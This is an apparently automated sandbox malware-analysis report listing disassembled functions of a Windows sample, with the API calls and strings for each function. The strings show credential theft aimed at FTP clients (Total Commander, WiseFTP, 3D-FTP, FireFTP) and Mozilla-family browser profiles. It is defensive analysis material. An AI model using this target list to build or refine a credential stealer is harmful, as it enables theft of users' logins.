                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocDirectoryLocalWindows
                  • String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
                  • API String ID: 3186838798-3636168975
                  • Opcode ID: ffea5e168f270e24eb25b05d6cc74e16a969fd76c9c952f636d6df37aa190e76
                  • Instruction ID: ff12591b31ff326238e2f8ff1c408cb403752ed0395ffe955c3525f53abc4278
                  • Opcode Fuzzy Hash: ffea5e168f270e24eb25b05d6cc74e16a969fd76c9c952f636d6df37aa190e76
                  • Instruction Fuzzy Hash: 2F41F0B0A80104BAEF213B62CD43F9D7E65EB55748F10853BB700B90F2DBBD99A0965C
                  Function 00404538 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 0040454E
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404582
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004046A9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: HostName$Password$User
                  • API String ID: 1332880857-1253078594
                  • Opcode ID: c3b991bb0fe04561cae893e15422e5c563704640a4d9e7a21aec12efcae835ee
                  • Instruction ID: dbef1a4a2983c09e8c68882a36fea80571c83e5172a5b0cd2e157321f814a4e2
                  • Opcode Fuzzy Hash: c3b991bb0fe04561cae893e15422e5c563704640a4d9e7a21aec12efcae835ee
                  • Instruction Fuzzy Hash: E331A77194011CBADF227B51CC42BDD7BB9BF44308F10C4BAB645750B1DBBA5A91AF88
                  Function 004089EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408A02
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408A36
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408B28
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
                  • API String ID: 1332880857-3184955129
                  • Opcode ID: d5dd535362712fa5a46c74c6496d1ec087d2de753653d067e406bb6c2482dc77
                  • Instruction ID: a70945101c84c7ac796ce7a614a6bd97096326bed53b746d6beeb2bdcda40b4a
                  • Opcode Fuzzy Hash: d5dd535362712fa5a46c74c6496d1ec087d2de753653d067e406bb6c2482dc77
                  • Instruction Fuzzy Hash: 9E31F83190010DBADF216F61CD42FDD7ABABF04344F10C4BAB554B50A2DFB95A91AF98
                  Function 004099AD Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 47COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409A0A
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409A4F
                    • Part of subcall function 00401C21: lstrlen.KERNEL32(?), ref: 00401C42
                    • Part of subcall function 00401C21: lstrlen.KERNEL32(00000000,?), ref: 00401C4C
                    • Part of subcall function 00401C21: lstrcpy.KERNEL32(00000000,?), ref: 00401C60
                    • Part of subcall function 00401C21: lstrcat.KERNEL32(00000000,00000000), ref: 00401C69
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
                  • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
                  • API String ID: 3007406096-624000163
                  • Opcode ID: 077474363eb1cb21634e0b13a7f884a159e08b407b3dd271821e8b6df93273d4
                  • Instruction ID: 067d11940ba8822908139912771a022fcba50eecc684ffed189774b448b63df1
                  • Opcode Fuzzy Hash: 077474363eb1cb21634e0b13a7f884a159e08b407b3dd271821e8b6df93273d4
                  • Instruction Fuzzy Hash: A4015E70640208B9DB217F61CC47FDA3EA89B08B49F10807ABA04751E7DBB9CB909A5C
                  Function 0040981E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85registryCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(?,?), ref: 0040982A
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004098A1
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 004098CD
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409915
                    • Part of subcall function 00402200: lstrlen.KERNEL32(?), ref: 00402214
                    • Part of subcall function 00402200: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 00402233
                    • Part of subcall function 00402200: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402245
                    • Part of subcall function 00402200: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402257
                    • Part of subcall function 00401C21: lstrlen.KERNEL32(?), ref: 00401C42
                    • Part of subcall function 00401C21: lstrlen.KERNEL32(00000000,?), ref: 00401C4C
                    • Part of subcall function 00401C21: lstrcpy.KERNEL32(00000000,?), ref: 00401C60
                    • Part of subcall function 00401C21: lstrcat.KERNEL32(00000000,00000000), ref: 00401C69
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
                  • String ID: PathToExe
                  • API String ID: 3012581338-1982016430
                  • Opcode ID: 6c3ee56b1af1d609d7f11486cfbfb07c182c8bca4d67ddacbaab2672a77783be
                  • Instruction ID: 4240f0cea3594d7691bdb638aaead59f9fffd590682c6645e5e2c10b6cb559ff
                  • Opcode Fuzzy Hash: 6c3ee56b1af1d609d7f11486cfbfb07c182c8bca4d67ddacbaab2672a77783be
                  • Instruction Fuzzy Hash: 27310F71910109BADF017FA1CD02EEE7A75FF05344F10443ABA11B51F2DBBA8E60AB69
                  Function 004025CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82COMMON
                  Download Yara Rule
                  APIs
                  • GetTempPathA.KERNEL32(00000104,?), ref: 00402602
                  • GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 00402684
                  • GlobalLock.KERNEL32(?), ref: 00402690
                  • GlobalUnlock.KERNEL32(?), ref: 004026B2
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(?), ref: 00401BEE
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                    • Part of subcall function 00401BCD: lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                    • Part of subcall function 00401BCD: lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                    • Part of subcall function 00401C21: lstrlen.KERNEL32(?), ref: 00401C42
                    • Part of subcall function 00401C21: lstrlen.KERNEL32(00000000,?), ref: 00401C4C
                    • Part of subcall function 00401C21: lstrcpy.KERNEL32(00000000,?), ref: 00401C60
                    • Part of subcall function 00401C21: lstrcat.KERNEL32(00000000,00000000), ref: 00401C69
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Global$lstrcatlstrcpy$FromLockPathStreamTempUnlock
                  • String ID: Software\WinRAR
                  • API String ID: 2536169780-224198155
                  • Opcode ID: 1187d3a3ac6e2532d8f5cc01240ee3561c668e13f9ba7699e1051f0c0d89f365
                  • Instruction ID: 2abfcd972a9822b01129ef8867a75c560604cbfc2d7908670ee80c51707ce61e
                  • Opcode Fuzzy Hash: 1187d3a3ac6e2532d8f5cc01240ee3561c668e13f9ba7699e1051f0c0d89f365
                  • Instruction Fuzzy Hash: C3212C7190010DBADF11BBE1CD46DDE7B79AB04348F104877B600F10F2EBBA9A949B68
                  Function 0040442A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00404440
                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000,?,?), ref: 00404479
                  • StrStrIA.SHLWAPI(?,Line), ref: 004044AA
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 0040452F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpenValue
                  • String ID: Line
                  • API String ID: 4012628704-1898322888
                  • Opcode ID: 9dc5b1b612268df97d841b8a8d495a88f1f2b345677e12d1725af5aa0e4e1e7d
                  • Instruction ID: f91f4e1feec9d5ad625a7b2a9fab21848115cfa1c53827807270e1285b900478
                  • Opcode Fuzzy Hash: 9dc5b1b612268df97d841b8a8d495a88f1f2b345677e12d1725af5aa0e4e1e7d
                  • Instruction Fuzzy Hash: C421197180001CBADF21AB91CD41BDDBBB9BF41304F10C0B7B644B51A1DBBA9A95EF99
                  Function 0040DF62 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DF75
                  • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040DFAE
                  • StrStrIA.SHLWAPI(?,.wjf), ref: 0040DFF5
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E022
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpenValue
                  • String ID: .wjf
                  • API String ID: 4012628704-198459012
                  • Opcode ID: 4f05375757efe4b6d3688668ce3f3ea3473d9cca9a06c75d9ea5d1bdf91f0b83
                  • Instruction ID: 43279a2a018755c5e1060965d219f417e113db824b34a168a00d580839c9dc7a
                  • Opcode Fuzzy Hash: 4f05375757efe4b6d3688668ce3f3ea3473d9cca9a06c75d9ea5d1bdf91f0b83
                  • Instruction Fuzzy Hash: 5C11263191001DBACF11AF91CC01AEEBBB8BF00304F1084B6A545B51A1DBBA9B95AF99
                  Function 00404189 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004025CC: GetTempPathA.KERNEL32(00000104,?), ref: 00402602
                    • Part of subcall function 004025CC: GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 00402684
                    • Part of subcall function 004025CC: GlobalLock.KERNEL32(?), ref: 00402690
                    • Part of subcall function 004025CC: GlobalUnlock.KERNEL32(?), ref: 004026B2
                  • CoCreateGuid.OLE32(?,00000000), ref: 004041AC
                  • wsprintfA.USER32 ref: 004041F3
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004041FF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Global$CreateFromGuidLockPathStreamTempUnlocklstrlenwsprintf
                  • String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                  • API String ID: 1852535927-1100116640
                  • Opcode ID: 840eb3ad66c41fe263eb2eafe22b724e0cc44c758affdf0c72c0414b0100f10f
                  • Instruction ID: c4e1b62278512b928dcdde7341008605bb0b3f4c3d7ab357c6a060e116bdcc76
                  • Opcode Fuzzy Hash: 840eb3ad66c41fe263eb2eafe22b724e0cc44c758affdf0c72c0414b0100f10f
                  • Instruction Fuzzy Hash: 07111BA69041A97DDB61E3F64C05DFFBAFC590D205B1401ABBA90E20C2E67DD7409B38
                  Function 00409926 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409954
                    • Part of subcall function 0040981E: StrStrIA.SHLWAPI(?,?), ref: 0040982A
                    • Part of subcall function 0040981E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 004098A1
                    • Part of subcall function 0040981E: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 004098CD
                    • Part of subcall function 0040981E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409915
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409999
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                  • API String ID: 3062143572-2631691096
                  • Opcode ID: b864d701e8e15c7e68fa2287fc1162954e377e81177388ab5f0c84afc04fd57d
                  • Instruction ID: 7b62cf37f070a4fb375d2b5b1302e7b5f4762ac1398b9eae7c482788379758ad
                  • Opcode Fuzzy Hash: b864d701e8e15c7e68fa2287fc1162954e377e81177388ab5f0c84afc04fd57d
                  • Instruction Fuzzy Hash: 1CF03031640208BADB21BF51DD43FC97EA9AB08B48F508066B604751E3DBF99BD09B4C
                  Function 00409A63 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409A91
                    • Part of subcall function 0040981E: StrStrIA.SHLWAPI(?,?), ref: 0040982A
                    • Part of subcall function 0040981E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 004098A1
                    • Part of subcall function 0040981E: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 004098CD
                    • Part of subcall function 0040981E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409915
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409AD6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
                  • API String ID: 3062143572-164276155
                  • Opcode ID: c03f42ead4cdf643d7099342c91f6daac96ae31a6cfeadbc48a658cf60dfd6c9
                  • Instruction ID: c662e76dbef64a068a92444c77d56f754835518ac613da1a147b232d30860ea1
                  • Opcode Fuzzy Hash: c03f42ead4cdf643d7099342c91f6daac96ae31a6cfeadbc48a658cf60dfd6c9
                  • Instruction Fuzzy Hash: 84F09670640208BADB20BF51CC03FC93EB8AB08705F508066B604751E7DBF99BD09B4C
                  Function 00409AEA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409B18
                    • Part of subcall function 0040981E: StrStrIA.SHLWAPI(?,?), ref: 0040982A
                    • Part of subcall function 0040981E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 004098A1
                    • Part of subcall function 0040981E: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 004098CD
                    • Part of subcall function 0040981E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409915
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409B5D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: Flock$Software\Mozilla$\Flock\Browser\
                  • API String ID: 3062143572-1276807325
                  • Opcode ID: 39e9080a4629d2c137f4b2ce5545a2bb9fff7d0a9044e6c14ccc3c37974c2919
                  • Instruction ID: a515aee1485dadb476b2cec9ed0f6dd48552a6037751f694a694d3432716905f
                  • Opcode Fuzzy Hash: 39e9080a4629d2c137f4b2ce5545a2bb9fff7d0a9044e6c14ccc3c37974c2919
                  • Instruction Fuzzy Hash: 9AF03C31540208B9DB21BF51CD43FC97EA55B08709F508066B644751E3DBF99FD09B4C
                  Function 00409B71 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409B9F
                    • Part of subcall function 0040981E: StrStrIA.SHLWAPI(?,?), ref: 0040982A
                    • Part of subcall function 0040981E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 004098A1
                    • Part of subcall function 0040981E: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 004098CD
                    • Part of subcall function 0040981E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409915
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409BE4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
                  • API String ID: 3062143572-2716603926
                  • Opcode ID: 35396ce86b8c1788ae7f3e08cc35d1e1cac5d3709b2988d68ad3a82d525ea0fd
                  • Instruction ID: f2f27d82559fd93f4aef7c5dd116634fbea4d9850910639050c9cfc33e221ced
                  • Opcode Fuzzy Hash: 35396ce86b8c1788ae7f3e08cc35d1e1cac5d3709b2988d68ad3a82d525ea0fd
                  • Instruction Fuzzy Hash: A0F0FF31640208BADB21BF61CD46FC97EA99B08709F508066B708751E3DBB99AD09B48
                  Function 0040C63B Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 68COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(007200D8,3D-FTP), ref: 0040C662
                    • Part of subcall function 00402200: lstrlen.KERNEL32(?), ref: 00402214
                    • Part of subcall function 00402200: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 00402233
                    • Part of subcall function 00402200: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402245
                    • Part of subcall function 00402200: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402257
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
                  • API String ID: 1884169789-4074339522
                  • Opcode ID: ffa0572995a0a9c20b75555718e68e314bfe6d377330d184481ef0f8697a6f48
                  • Instruction ID: 05781279a1ca6ad0879fa58fbbf1fa8e39e2ddecbbd928bb128e0cd783bf3fcc
                  • Opcode Fuzzy Hash: ffa0572995a0a9c20b75555718e68e314bfe6d377330d184481ef0f8697a6f48
                  • Instruction Fuzzy Hash: 29118A70A40106B9EB213B758D43F6E6D5E9B40B44F140A3BB905B61F3DABEDF81926C
                  Function 0040AAB9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 0040AACF
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AB03
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040ABEB
                    • Part of subcall function 0040A820: wsprintfA.USER32 ref: 0040A88C
                    • Part of subcall function 0040A820: wsprintfA.USER32 ref: 0040A89F
                    • Part of subcall function 0040A820: wsprintfA.USER32 ref: 0040A8B2
                    • Part of subcall function 0040A820: wsprintfA.USER32 ref: 0040A8C5
                    • Part of subcall function 0040A820: wsprintfA.USER32 ref: 0040A8D8
                    • Part of subcall function 0040A820: wsprintfA.USER32 ref: 0040A8EB
                    • Part of subcall function 0040A820: wsprintfA.USER32 ref: 0040A8FE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: wsprintf$CloseEnumOpen
                  • String ID: SiteServers
                  • API String ID: 1693054222-2402683488
                  • Opcode ID: 842825de6b12b5884e4bf6c3bbd2820ca561ba5566c8314c0948b6f73f529da8
                  • Instruction ID: ed54c4af48630386b875223b5aacfa6e9f83f9959f85fd59627ed8d9c20c5b6f
                  • Opcode Fuzzy Hash: 842825de6b12b5884e4bf6c3bbd2820ca561ba5566c8314c0948b6f73f529da8
                  • Instruction Fuzzy Hash: 2D310D3190021CEADF21AB91CD02BDDBBB9BF04304F14C0B6E645751A1DB795B92DF9A
                  Function 00408900 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408913
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408947
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004089E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: MRU
                  • API String ID: 1332880857-344939820
                  • Opcode ID: 845d2110dc0d070f6aad7f860df3a24118c130d8e70c858ad76698d3bd0dcbf9
                  • Instruction ID: f22ab4a82fd2cd57d0579e0df880e18baf2207f6d239757fe164980efb60308f
                  • Opcode Fuzzy Hash: 845d2110dc0d070f6aad7f860df3a24118c130d8e70c858ad76698d3bd0dcbf9
                  • Instruction Fuzzy Hash: 8A21187190010CBACF11AF91CD42FEE7BB9BF04304F10C4BAB555B50A1DBB95A91AF99
                  Function 00401A62 Relevance: 6.1, APIs: 4, Instructions: 87registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401AA7
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401AC2
